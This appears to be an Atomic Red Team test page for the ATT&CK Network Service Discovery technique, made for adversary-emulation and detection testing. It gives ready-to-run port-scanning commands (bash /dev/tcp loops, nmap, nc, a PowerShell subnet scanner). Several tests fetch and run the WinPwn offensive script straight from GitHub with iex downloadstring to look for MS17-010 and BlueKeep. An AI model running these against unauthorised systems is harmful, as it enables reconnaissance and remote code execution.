Try it using Invoke-Atomic

Network Service Discovery

Description from ATT&CK

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)

Atomic Tests

Atomic Test #1 - Port Scan

Scan ports to check for listening ports.

Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.

Supported Platforms: linux,macos

auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540

Inputs:

Name Description Type Default Value
host Host to scan. string 192.168.1.1

Attack Commands: Run with bash!

1
2
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done

Atomic Test #2 - Port Scan Nmap

Scan ports to check for listening ports with Nmap.

Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

Supported Platforms: linux,macos

auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f

Inputs:

Name Description Type Default Value
host Host to scan. string 192.168.1.1
port Ports to scan. string 80
network_range Network Range to Scan. string 192.168.1.0/24

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
4
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}

Dependencies: Run with sh!

Description: Check if nmap command exists on the machine

Check Prereq Commands:

1
2
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)

Description: Check if nc command exists on the machine

Check Prereq Commands:

1
2
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)

Description: Check if telnet command exists on the machine

Check Prereq Commands:

1
2
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)

Atomic Test #3 - Port Scan Nmap for FreeBSD

Scan ports to check for listening ports with Nmap.

Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

Supported Platforms: freebsd

auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048

Inputs:

Name Description Type Default Value
host Host to scan. string 192.168.1.1
port Ports to scan. string 80
network_range Network Range to Scan. string 192.168.1.0/24

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
4
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}

Dependencies: Run with sh!

Description: Check if nmap command exists on the machine

Check Prereq Commands:

1
2
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
(which pkg && pkg install -y nmap)

Atomic Test #4 - Port Scan NMap for Windows

Scan ports to check for listening ports for the local host 127.0.0.1

Supported Platforms: windows

auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df

Inputs:

Name Description Type Default Value
nmap_url NMap installer download URL url https://nmap.org/dist/nmap-7.80-setup.exe
host_to_scan The host to scan with NMap string 127.0.0.1

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
nmap #{host_to_scan}

Dependencies: Run with powershell!

Description: NMap must be installed

Check Prereq Commands:

1
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
4
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" #{nmap_url}
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" /S

Atomic Test #5 - Port Scan using python

Scan ports to check for listening ports with python

Supported Platforms: windows

auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c

Inputs:

Name Description Type Default Value
host_ip Host to scan. string 127.0.0.1
filename Location of the project file path PathToAtomicsFolder\T1046\src\T1046.py

Attack Commands: Run with powershell!

1
2
python "#{filename}" -i #{host_ip}

Dependencies: Run with powershell!

Description: Check if python exists on the machine

Check Prereq Commands:

1
2
if (python --version) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
echo "Python 3 must be installed manually"

Atomic Test #6 - WinPwn - spoolvulnscan

Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn

Supported Platforms: windows

auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput

Atomic Test #7 - WinPwn - MS17-10

Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn

Supported Platforms: windows

auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput

Atomic Test #8 - WinPwn - bluekeep

Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).

Supported Platforms: windows

auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput

Atomic Test #9 - WinPwn - fruit

Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn

Supported Platforms: windows

auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput

Atomic Test #10 - Network Service Discovery for Containers

Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.

Supported Platforms: containers

auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa

Inputs:

None

Attack Commands: Run with sh!

1
2
3
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
docker run --name t1046_container  -d -t t1046
docker exec t1046_container ./test.sh

Cleanup Commands:

1
2
docker stop t1046_container
docker rmi -f t1046

Dependencies: Run with sh!

Description: Verify docker is installed. Check Prereq Commands:

1
2
which docker

Get Prereq Commands:

1
2
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi

Description: Verify docker service is running. Check Prereq Commands:

1
2
sudo systemctl status docker  --no-pager

Get Prereq Commands:

1
2
sudo systemctl start docker

Atomic Test #11 - Port-Scanning /24 Subnet with PowerShell

Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.

Supported Platforms: windows

auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4

Inputs:

Name Description Type Default Value
ip_address IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. string  
port_list Comma separated list of ports to scan string 445, 3389
timeout_ms Connection timeout in milliseconds string 200

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ipAddr = "#{ip_address}"
if ($ipAddr -eq "") {
    # Assumes the "primary" interface is shown at the top
    $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
    Write-Host "[i] Using Interface $interface"
    $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

foreach ($ip in $subnetIPs) {
    foreach ($port in $ports) {
      try {
          $tcp = New-Object Net.Sockets.TcpClient
          $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
      } catch {}
      if ($tcp.Connected) {
          $tcp.Close()
          Write-Host "Port $port is open on $ip"
      }
    }
}

source